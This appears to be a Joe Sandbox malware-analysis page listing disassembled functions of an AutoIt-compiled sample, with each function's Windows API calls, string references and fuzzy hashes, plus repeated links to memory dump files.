Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 8d8c66b57ec94e5203562c27c857ecc24034dd90ddb6cc397c01326335c03ae6
Instruction ID: a0ecb9ed76821816613781fd249f46d5cc607f48fe0bb36ead2adec8e1b9ceb8
Opcode Fuzzy Hash: 8d8c66b57ec94e5203562c27c857ecc24034dd90ddb6cc397c01326335c03ae6
Instruction Fuzzy Hash: BB114675D00209EFDB41CF99D544AEEFBB5FB08310F104166E914E3220D735AA558F50

Function 00C9B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C9B644
_memset.LIBCMT ref: 00C9B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00CD6F20,00CD6F64), ref: 00C9B682
CloseHandle.KERNEL32 ref: 00C9B694

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: f424ac7c0401e67e923be0c321e5aefe6178e3efb925ee491adafa8957eb96f5
Instruction ID: dc33c1d946d72277de47355d71f1b9cab80c19e0a72d24edec0d96a26c373ffe
Opcode Fuzzy Hash: f424ac7c0401e67e923be0c321e5aefe6178e3efb925ee491adafa8957eb96f5
Instruction Fuzzy Hash: A0F05EF26417047AE61027A1BC0AFBF3B9CEB08395F004026FA08E51A2D7755C01C7A8

Function 00C76BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00C76BE6

Part of subcall function 00C776C4: _memset.LIBCMT ref: 00C776F9

_memmove.LIBCMT ref: 00C76C09
_memset.LIBCMT ref: 00C76C16
LeaveCriticalSection.KERNEL32(?), ref: 00C76C26

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 64a0b7814f3cf9ffa6da506666fc36702e54bb2576c834921a434cf8023919c9
Instruction ID: b074a19c5e74b8d709c276a97a4389888d781d9a934d997cc97994ab19e11287
Opcode Fuzzy Hash: 64a0b7814f3cf9ffa6da506666fc36702e54bb2576c834921a434cf8023919c9
Instruction Fuzzy Hash: D4F05E3A200100ABCF016F55EC89B8ABB2AEF45361F14C066FE089E227C731E811DBB4

Function 00C12218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00C12231
SetTextColor.GDI32(?,000000FF), ref: 00C1223B
SetBkMode.GDI32(?,00000001), ref: 00C12250
GetStockObject.GDI32(00000005), ref: 00C12258
GetWindowDC.USER32(?,00000000), ref: 00C4BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 00C4BE90
GetPixel.GDI32(00000000,?,00000000), ref: 00C4BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 00C4BEC2
GetPixel.GDI32(00000000,?,?), ref: 00C4BEE2
ReleaseDC.USER32(?,00000000), ref: 00C4BEED

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 5ef4426c8c6865752711ab4c6c19ca9384c3345b36d7247a0ee591ae7f4bec5f
Instruction ID: 4219de152f88f9e5ac2e82b4b0be446f0854dbc1925e8c7a53b8bb72b30ff01a
Opcode Fuzzy Hash: 5ef4426c8c6865752711ab4c6c19ca9384c3345b36d7247a0ee591ae7f4bec5f
Instruction Fuzzy Hash: 0EE03031104144AADB215F64EC0D7DC3B20EB06332F10836BFA79880E187B14AA1DB51

Function 00C68712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00C6871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,00C682E6), ref: 00C68722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C682E6), ref: 00C6872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,00C682E6), ref: 00C68736

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 13adfc7f7131261c1fc1dcc6aacdc58425e15816358f2416e94140f389e9358d
Instruction ID: 18ed04cab9b7f8842b1b4b5ad31fd5c3c98c87205ba8ff1d218cd0ba968dd0b3
Opcode Fuzzy Hash: 13adfc7f7131261c1fc1dcc6aacdc58425e15816358f2416e94140f389e9358d
Instruction Fuzzy Hash: 73E086366112119BD7205FB05D4DB5E3BACEF54791F14482DB245C9050DA748456C750

Function 00C6B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00C6B4BE

Strings

AutoIt3GUI, xrefs: 00C6B436
Container, xrefs: 00C6B43B

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: d1a863c9d64229d46c489a47473708ce5d4e121c063a9dec6adca0bfcf22ba68
Instruction ID: 7f6e1e8b491d76efa16cc335b89bb033105f9cb686ef193977ef4e97ccaeaaec
Opcode Fuzzy Hash: d1a863c9d64229d46c489a47473708ce5d4e121c063a9dec6adca0bfcf22ba68
Instruction Fuzzy Hash: 37913871600601AFDB24DF64C894BAAB7E9FF49710F20856DF94ACB2A1DB70ED81CB50

Function 00C7AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00C2FC86: _wcscpy.LIBCMT ref: 00C2FCA9

Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC

__wcsnicmp.LIBCMT ref: 00C7B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C7B0F6

Strings

LPT, xrefs: 00C7B027

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 9dec6487fb433983b4659160a2517ff0197c454defc16ac7851fcdf916a1b9bb
Instruction ID: b72ae12764f14357d6795c61cd946fc962ede52bc71589e51b5c30e76bf8b37c
Opcode Fuzzy Hash: 9dec6487fb433983b4659160a2517ff0197c454defc16ac7851fcdf916a1b9bb
Instruction Fuzzy Hash: B5617575A00219AFDB14DF54C895FEEB7B4EF09310F108069F91AAB291DB70AF85DB50

Function 00C22957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00C22968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00C22981

Strings

@, xrefs: 00C22975

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: b70f8d676d19e060566e16f2e83dc2a3627d8ae0c583869b1e9118f45f1debb2
Instruction ID: 4289524a2a9c9db2335bc3a816e0b08ba630470602989ed5ecc5f60e4fb9d3a1
Opcode Fuzzy Hash: b70f8d676d19e060566e16f2e83dc2a3627d8ae0c583869b1e9118f45f1debb2
Instruction Fuzzy Hash: C9513871418744ABE720EF10D886BEFBBE8FF86344F41885DF2D8411A1DB318569EB66

Function 00C79734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00C14F0B: __fread_nolock.LIBCMT ref: 00C14F29

_wcscmp.LIBCMT ref: 00C79824
_wcscmp.LIBCMT ref: 00C79837

Strings

FILE, xrefs: 00C79770

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 73cf2b7483399f3475f87cfcfcc9e5f27723fa6f963cfb544ed5f799b376de92
Instruction ID: ee42e2c5a5ada3079313e3f181c15bf59ae02fa2664262f456c3c2600f44b806
Opcode Fuzzy Hash: 73cf2b7483399f3475f87cfcfcc9e5f27723fa6f963cfb544ed5f799b376de92
Instruction Fuzzy Hash: D741D571A00209BBDF249EE4CC45FEFBBBDDF86710F004069F904A7280DA719A45AB61

Function 00C8258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C8259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C825D4

Strings

|, xrefs: 00C825A5

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: c3849abe75f26f8e3e0fe4856ae882497b88d6234f91426be78adfca4e5f4d6c
Instruction ID: ce195630bed5bcbaa2c55efd8bce3c0b9dfae4a9c895e2a5db34172ee6536857
Opcode Fuzzy Hash: c3849abe75f26f8e3e0fe4856ae882497b88d6234f91426be78adfca4e5f4d6c
Instruction Fuzzy Hash: 7A311D71800119EBCF11EFA1CC89EEEBFB8FF09314F100159F915A6161EB315996EB90

Function 00C97A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00C97B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C97B76

Strings

', xrefs: 00C97ACA

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 346d294867a88a0f38c288de21a4193ab69b01987e7d6a5e979b07cf516347f9
Instruction ID: db2ff18d14d35aeb17a1309800ef99cd5f32fb4f43c4731de764f9f52fc25875
Opcode Fuzzy Hash: 346d294867a88a0f38c288de21a4193ab69b01987e7d6a5e979b07cf516347f9
Instruction Fuzzy Hash: E2411774A062099FDF14CF65C985BEEBBB5FB08300F10026AE904AB381D730AA51DF90

Function 00C96A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00C96B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C96B53

Strings

static, xrefs: 00C96AB3

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 590af01abf036049ec1c55e311cdb5c5a6eb2366dfd6f4731da337ba944cc2a3
Instruction ID: d780b827b6bc0f9eb0e8ea0f6b86bf122069799b3c5a81b705a71049fa8a86ed
Opcode Fuzzy Hash: 590af01abf036049ec1c55e311cdb5c5a6eb2366dfd6f4731da337ba944cc2a3
Instruction Fuzzy Hash: F9318D71200604AEDF109F64CC84BFB73A9FF48760F108619F9A9D7190DB31AD92E760

Function 00C728A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C72911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C7294C

Strings

0, xrefs: 00C7290A

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: a310d6aad6f16bd443122f83afb895ad607e198b4415167916eb1503b99d0e2d
Instruction ID: 10e24410106bcee6bacecceff6be8fae3b25273c4a781ec34c8464768a34dff9
Opcode Fuzzy Hash: a310d6aad6f16bd443122f83afb895ad607e198b4415167916eb1503b99d0e2d
Instruction Fuzzy Hash: 0731E631A003059FEF24DF59DC45BAEBBF8FF45350F188019EAD9A61A0D7709A40DB51

Function 00C839E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00C83A66

Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22

Strings

AUTOITCALLVARIABLE%d, xrefs: 00C83A58
, $, xrefs: 00C83AA6

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: d896b01a79809b50fdb65285ceede9071d1415f17c6253441458dd9c928777c8
Instruction ID: 57a6c3c9f690ab97bcd2377e5eaacf762b1f4b279b3f3c454b5e3e5a933ab4f4
Opcode Fuzzy Hash: d896b01a79809b50fdb65285ceede9071d1415f17c6253441458dd9c928777c8
Instruction Fuzzy Hash: 44219331600119AFCF14FFA4CC91EEE77B5AF45740F500468F445A7281DB34EA86EBA5

Function 00C966D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C96761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C9676C

Strings

Combobox, xrefs: 00C9672E

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 8a2dd803ad027c1d0aab768f718106093f563c0e9e65c6459b97fb8046081f35
Instruction ID: 814f690ac96abcdd87066f09159f6a416c0beb112fbb0eb9a02e76bc982f0686
Opcode Fuzzy Hash: 8a2dd803ad027c1d0aab768f718106093f563c0e9e65c6459b97fb8046081f35
Instruction Fuzzy Hash: B811B271200208BFEF119F94DC88FFB376AEB493A8F114129F924972D0D6319D5197A0

Function 00C96C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00C11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C11D73
Part of subcall function 00C11D35: GetStockObject.GDI32(00000011), ref: 00C11D87
Part of subcall function 00C11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C11D91

GetWindowRect.USER32(00000000,?), ref: 00C96C71
GetSysColor.USER32(00000012), ref: 00C96C8B

Strings

static, xrefs: 00C96C4E

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: bce20521d175b1ceb7dd467e612616eb5778566023e088163a52d0b6c25ee407
Instruction ID: be88aac1e909ddd468c8042d7a21d972948b0a74afffaa3796e68e5013f8fc01
Opcode Fuzzy Hash: bce20521d175b1ceb7dd467e612616eb5778566023e088163a52d0b6c25ee407
Instruction Fuzzy Hash: B8212972510209AFDF04DFA8CC49AFA7BA8FB08314F154629FD95D2250D635E861DB60

Function 00C96920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00C969A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C969B1

Strings

edit, xrefs: 00C96986

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: c1614dbddcb9c77c1e112d9354c9fc78b9efe73089c019da48bbc98df346dd88
Instruction ID: e1e767756b5d361b798b73c28d5f58b2a6fefbf98c54e8ebbe3e2ec4379b72e2
Opcode Fuzzy Hash: c1614dbddcb9c77c1e112d9354c9fc78b9efe73089c019da48bbc98df346dd88
Instruction Fuzzy Hash: BB116A71510208ABEF109F649C48FEB37A9EB053B8F624728F9B5971E0C635DC91A760

Function 00C729AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C72A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C72A41

Strings

0, xrefs: 00C72A18

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
